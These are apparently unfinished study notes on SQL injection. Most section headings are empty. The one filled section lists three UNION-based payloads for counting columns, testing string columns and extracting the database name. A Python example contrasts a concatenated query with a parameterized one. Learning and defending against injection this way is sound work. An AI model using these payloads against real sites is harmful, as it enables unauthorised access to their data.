SQL Injection

Introduction

Basics of SQL Language

What is SQLi

How to detect SQLi


Error Based SQLi



Boolean Based SQLi


UNION Based SQLi




After testing different numbers of columns, we can find the number of columns returned by the original query with this search query:
' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //

We can also see that all of the columns accept string input with this query:
' UNION SELECT 'a','a','a','a','a' -- //

We can see the name of the database with this query:
' UNION SELECT 'a',database(),'a','a','a' -- //
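
Why the five-column payload above works, and how a bound parameter stops it, shown as an added example that is not part of the original notes. It assumes a hypothetical five-column `products` table behind the search field and uses in-memory SQLite in place of the MySQL target (so the `database()` payload is not used).

```python
import sqlite3

# Constructed sample data: a five-column table, matching the five-column
# payloads in the notes. Table and column names are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, description TEXT,"
               " price TEXT, category TEXT)")
    db.executemany("INSERT INTO products VALUES (?,?,?,?,?)", [
        (1, "lamp", "desk lamp", "19.99", "home"),
        (2, "mug", "coffee mug", "7.50", "kitchen"),
    ])
    return db

def search_vulnerable(db, term):
    # The input is concatenated into the SQL text, so a quote in `term`
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT id, name, description, price, category FROM products "
           "WHERE name LIKE '%" + term + "%'")
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The input is bound as a value and is never parsed as SQL, so the
    # whole payload is just an odd product name that matches nothing.
    sql = ("SELECT id, name, description, price, category FROM products "
           "WHERE name LIKE '%' || ? || '%'")
    return db.execute(sql, (term,)).fetchall()

# Payload copied from the notes above.
PAYLOAD = "' UNION SELECT 'a','a','a','a','a' -- //"

if __name__ == "__main__":
    db = make_db()
    print("normal search:     ", search_vulnerable(db, "lamp"))
    print("concatenated input:", search_vulnerable(db, PAYLOAD))
    print("bound parameter:   ", search_parameterized(db, PAYLOAD))
```

In the concatenated version the result set gains a row of `'a'` values that never existed in the table; with the bound parameter the same input returns no rows.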


Automating Exploitation




